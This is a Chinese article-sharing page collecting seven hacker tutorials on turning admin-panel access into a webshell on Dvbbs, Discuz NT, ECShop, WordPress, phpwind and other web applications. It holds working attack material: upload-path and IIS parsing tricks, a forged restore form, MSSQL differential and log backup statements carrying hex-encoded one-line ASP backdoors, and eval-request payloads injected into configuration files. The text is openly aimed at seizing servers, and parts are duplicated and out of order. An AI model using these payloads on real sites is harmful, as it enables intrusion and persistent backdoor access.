扩展思维新方法后台拿shell

时间:2022-05-06 21:31:32 其他范文 收藏本文 下载本文

扩展思维新方法后台拿shell((合集7篇))由网友“我没有偷吃糖”投稿提供,以下是小编收集整理的扩展思维新方法后台拿shell,欢迎阅读与借鉴。

扩展思维新方法后台拿shell

篇1:扩展思维新方法后台拿shell

大家在后台,拿shell有什么方法??备份还原JPG木马,上传1.asp;.jpg木马,直接上传wenshell,数据库插马,手法有很多,今天我介绍钟方法,来扩展下拿shell的思维吧,。。。

我今天拿网趣的购物系统开刀测试吧。。

系统的后台有数据库备份功能,但是备份数据库名称:默认为shop.mdb ,所以上传JPG木马再还原是不行的,今天介绍钟变态方法吧,首先来到“增加产品”模块,选择上传小图片,修改木马为1.asp;.jpg,唉,命不好哦,上传后系统根据时间自己修改了名称,看来,方法需要变态点了,我们注意到,在弹出的上传框中的地址了吗?

我的浏览器IE8,大家知道不能直接修改地址的,所以我,提交上面的地址直接到浏览器里看看

不错,出现了,127.0.0.1:800/wq/upload.asp?formname=myform&editname=zhuang&uppath=upfile/proimage&filex=jpg,大家仔细分析分析地址

是不是最后有个=jpg的语句呢,我们修改成asp后再上传试试,唉,依然是JPG格式,那么我们这样修改,看到uppath=upfile/proimage

这个也许是上传的地址吧,经我验证,确实是这样,那么我们生成一个lanyan.asp的文件夹,修改这里直接传图片到该文件夹,构造IIS的解析漏洞也是可以的,但是我们如何生成这样特殊的文件夹呢???

大家仔细看看,有什么眉目,呵呵,是的,数据库备份这里,如果目录不存在将自动创建,所以,在备份目录里我这样写‘../databackup.asp’备份之后大家看

生成了吧??呵呵,再来到我们刚才的上传的地方,这样修改地址127.0.0.1:800/wq/upload.asp?formname=myform&editname=zhuang&uppath=databackup.asp&filex=jpg

提交之后直接上传JPG木马,然后我们查看源码

我们的构造很好,成功构造IIS解析漏洞了,我们来访问

好的,执行了,由于我用小旋风搭的服务器不是IIS,所以不能利用IIS解析洞洞,有IIS搭建的话,我们的WEBSHELL就会执行了,

。。

篇2:后台拿shell全集

后台拿shell全集

今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望大家都能成为脚本高手.

动网上传漏洞,相信大家拿下不少肉 ,可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方法进行了总结和归纳,大体情况有以下十大方面。

注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。

一、直接上传获得webshell

这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文件url应该是forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。

二、添加修改上传类型

现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa asP类型,ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp,可以添加.aspasp的文件类型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格! 七、asp+mssql系统

这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个本地提交的表单,代码如下:

<form. action=网站/bbs/admin_data.asp?action=RestoreData&act=Restore method=“post”>

<p>已上传文件的位置:<input name=“Dbpath” type=“text” size=“80”></p>

<p>要复制到的位置:<input name=“backpath” type=“text” size=“80”></p>

<p><input type=“submit” value=“提交”></p> </form>

另存为.htm本地执行。把假图片上传路径填在“已上传文件的位置”那里,想要备份的WebShell的相对路径填写在“要复制到的位置”那里,提交就得到我们可爱的WebShell了,恢复代码和此类似,修改相关地方就可以了。没有遇到过后台执行mssql命令比较强大的asp程序后台,动网的数据库还原和备份是个摆设,不能执行sql命令备份webshell,只能执行一些简单的查询命令。可以利用mssql注入差异备份webshell,一般后台是显示了绝对路径,只要有了注入点基本上就可以差异备份成功。下面是差异备份的主要语句代码,利用动网7.0的注入漏洞可以用差异备份一个webshell,可以用利用上面提到的方法,将conn.asp文件备份成.txt文件而获得库名。

差异备份的主要代码:

;declare @a sysname,@s varchar(4000) select @a=db_name,@s=0x626273 backup database @a to disk=@s--

;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--

;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

这段代码中,0x626273是要备份的库名bbs的十六进制,可以是其他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request(“l”)%>的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:web1.asp的十六进制,也就是你要备份的webshell路径。当然也可以用比较常见备份方式来获得webshell,唯一的不足就是备份后的文件过大,如果备份数据库中有防下载的的数据表,或者有错误的asp代码,备份出来的webshell就不会成功运行,利用差异备份是成功率比较高的方法,并且极大的减少备份文件的大小,

八、php+mysql系统

后台需要有mysql数据查询功能,我们就可以利用它执行SELECT ... INTO OUTFILE查询输出php文件,因为所有的数据是存放在mysql里的,所以我们可以通过正常手段把我们的webshell代码插入mysql在利用SELECT ... INTO OUTFILE语句导出shell。

就可以暴出路径,php环境中比较容易暴出绝对路径:)。提一点的是遇到是mysql在win系统下路径应该这样写。下面的方法是比较常用的一个导出webshell的方法,也可以写个vbs添加系统管理员的脚本导出到启动文件夹,系统重起后就会添加一个管理员帐号

就会在up目录下生成文件名为saiy.php内容为的最小php木马, 最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码 将会在当前目录生成一个a.php的最小马。

九、phpwind论坛从后台到webshell的三种方式

方式1 模板法

进入后台, 风格模版设置 ,在随便一行写代码,记住,这代码必须顶着左边行写,代码前面不可以有任何字符。

方始2 脏话过滤法

方式3 用户等级管理

以上三种方式得到webshellr的密码是a,为lanker的一句话后门服务端。

十、也可以利用网站访问计数系统记录来获得webshell

解决方案

由于本文涉及的代码版本很多,所以不可能提供一个完美的解决方案。有能力者可以针对本文提到的漏洞文件进行适当修补,若漏洞文件不影响系统使用也可删除此文件。大家如果不会修补,可以到相关 下载最新补丁进行修复更新。同时也请大家能时刻关注各大安全网络发布的最新公告,若自己发现相关漏洞也可及时通知 。

后记

其实,从后台得到webshell的技巧应该还有很多的,关键是要看大家怎么灵活运用、触类旁通,希望本文的方法能起到抛砖引玉的作用。 各位加油吧,让我们将服务器控制到底!

三、利用后台管理功能写入webshell

上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台修改配置文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:网站incIncHtmBoardLink.asp就是我们想要的shell。

四、利用后台管理向配置文件写webshell

利用“”“”:“”//“等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker@263.net”:eval request(chr (35))//, 在配制文件中就是webmail=“cnhacker@263.net”:eval request(chr(35))//“,还有一种方法就是写上 cnhacker@263.net”%><%eval request(chr(35))%><%',这样就会形成前后对应,最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的 客户端来连,需要说明的是数据库插马时候要选前者。再如动易,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话马“%><%execute request(”l“)%><%',保 存顶部栏目菜单参数设置成功后,我们就得到马地址网站/admin/rootclass_menu_config.asp。

五、利用后台数据库备份及恢复获得webshell

主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改 为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。还可以备份网站asp文件为其他后缀 如.txt文件,从而可以查看并获得网页源代码,并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时 候,但是有asp系统在运行,利用此方法来查看源代码来获得其数据库的位置,为数据库插马来创造机会,动网论坛就有一个ip地址的数据库,在后台的ip管理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的方法,很多asp程序在即使改了后缀名后也会提示文件非法,通过在.asp文件头加上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的,还有一种就是用记事本打开图片文件,随便粘贴一部分复制到asp木马文件头,修改gif后缀后上传也可以突破检测,然后备份为.asp文件,成功得到webshell。

六、利用数据库压缩功能

可以将数据的防下载失效从而使插入数据库的最小马成功运行,比较典型的就是loveyuki的L-BLOG,在友情添加的url出写上<%eval request (chr(35))%>, 提交后,在数据库操作中压缩数据库,可以成功压缩出.asp文件,用海洋的最小马的eval客户端连就得到一个webshell。

篇3:后台拿web shell全集

后台拿shell全集

今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望大家都能成为脚本高手.

动网上传漏洞,相信大家拿下不少肉鸡 ,可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方法进行了总结和归纳,大体情况有以下十大方面。

注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。

一、直接上传获得webshell

这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文件url应该是forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统),因过滤上传文件不严,导致用户可以直接上传webshell到网站任意可写目录中,从而拿到网站的管理员控制权限。

二、添加修改上传类型

现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa asP类型,ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp,可以添加.aspasp的文件类型来上传获得webshell,

php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格! 七、asp+mssql系统

这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个本地提交的表单,代码如下:

<form. act ion=网站/bbs/admin_data.asp?ac tion=RestoreData&act=Restore method=”post“>

<p>已上传文件的位置:<input name=”Dbpath“ type=”text“ size=”80“></p>

<p>要复制到的位置:<input name=”backpath“ type=”text“ size=”80“></p>

<p><input type=”submit“ value=”提交"></p> </form>

另存为.htm本地执行。把假图片上传路径填在“已上传文件的位置”那里,想要备份的WebShell的相对路径填写在“要复制到的位置”那里,提交就得到我们可爱的WebShell了,恢复代码和此类似,修改相关地方就可以了。没有遇到过后台执行mssql命令比较强大的asp程序后台,动网的数据库还原和备份是个摆设,不能执行sql命令备份webshell,只能执行一些简单的查询命令。可以利用mssql注入差异备份webshell,一般后台是显示了绝对路径,只要有了注入点基本上就可以差异备份成功。下面是差异备份的主要语句代码,利用动网7.0的注入漏洞可以用差异备份一个webshell,可以用利用上面提到的方法,将conn.asp文件备份成.txt文件而获得

篇4:dz7后台拿shell

要求:

1.创始人权限

2.开启在线编辑模板.

几率非常小,

config.php

$_SC['allowedittpl'] = 0;

这个东西默认是0

if(!emptyempty($_SC['allowedittpl']) && $isfounder) {

$acs[2][] = 'template';

}

篇5:Discuz! NT3.0后台拿shell

作者:icysun

本人不才,搞了好长时间才搞明白怎么拿shell

进了后台我们可以知道网站的路径,这个很重要

直接导出一句话 Select * from table1 into outfile 'c:test.txt' 这样是不行的(不知道是我哪里不对,还是根本就不行),

所以我们只能log或者差异备份了,我们要知道库的名字,其实不用很麻烦的找,

直接选择备份数据库,就会告诉我们库的名字

在这里我建议使用log备份

因为我差异备份N次都没成功,虽然备份进去了

alter database 库名 set RECOVERY FULL

create table [dbo].[icy] ([sun] [image]);

insert into [icy](sun) values (0x3C25657865637574652872657175657374282261222929253EDA)    //一句话密码  a

backup log 库名 to disk = 'E:icy.asp'

drop table icy

篇6:ECShop V2.7.3后台拿shell

首先我去安装最新版,

安装完成,

选择模版管理 - 语言项编辑

搜索“用户信息” 在用户信息后面加上:

然后确认修改, 访问根目录下user.php

在同目录下生成pcsli.php 一句话密码为:pcsli

篇7:WORDPRESS后台拿SHELL的方法

来自t00ls

不是0day,只是之前用了一周的WP试着做博客来着,发现WP如果能进后台就可以直接拿SHELL的。

大牛说插入404文件,那个何必呢,动别人文件总归是不好,插挂了就悲剧了,

本机建立目录“wawa”,把一句话1.php放进去。打包wawa目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为:

wp-contentthemeswawa1.php

毫无技术含量,大牛不要拍我。

星光贴吧1.3 后台拿SHELL及修复方案漏洞预警

Shell编程之正则表达式详解

高级运维工程师的职责

ideacms文章管理系统漏洞及修复

对一个网站进行渗透的过程

如何成功清除“熊猫烧香”病毒

dedecms 补出来的一个鸡肋漏洞漏洞预警

教你做服务级的木马后门

AWStats 6.4及以下版本多个漏洞以及分析

企业网站后台安全防范的基本方法介绍

扩展思维新方法后台拿shell
《扩展思维新方法后台拿shell.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【扩展思维新方法后台拿shell(合集7篇)】相关文章:

linux一些基本命令以及初级网络配置方法2022-07-27

网络管理员协议书2022-05-07

一次意外突破安全狗拿Shell2023-03-26

方正熊猫病毒年鉴:病毒之最2022-04-29

Shell中的变量使用小结2022-07-08

帝国CMS 留言本多字节漏洞漏洞预警2023-04-15

linux当mysql以root权限登录时提权网站安全2023-08-17

网络管理员面试题2023-04-14

SA399第四章读书笔记Windows系统2022-06-03

个人嵌入式学习总结2024-04-30

点击下载本文文档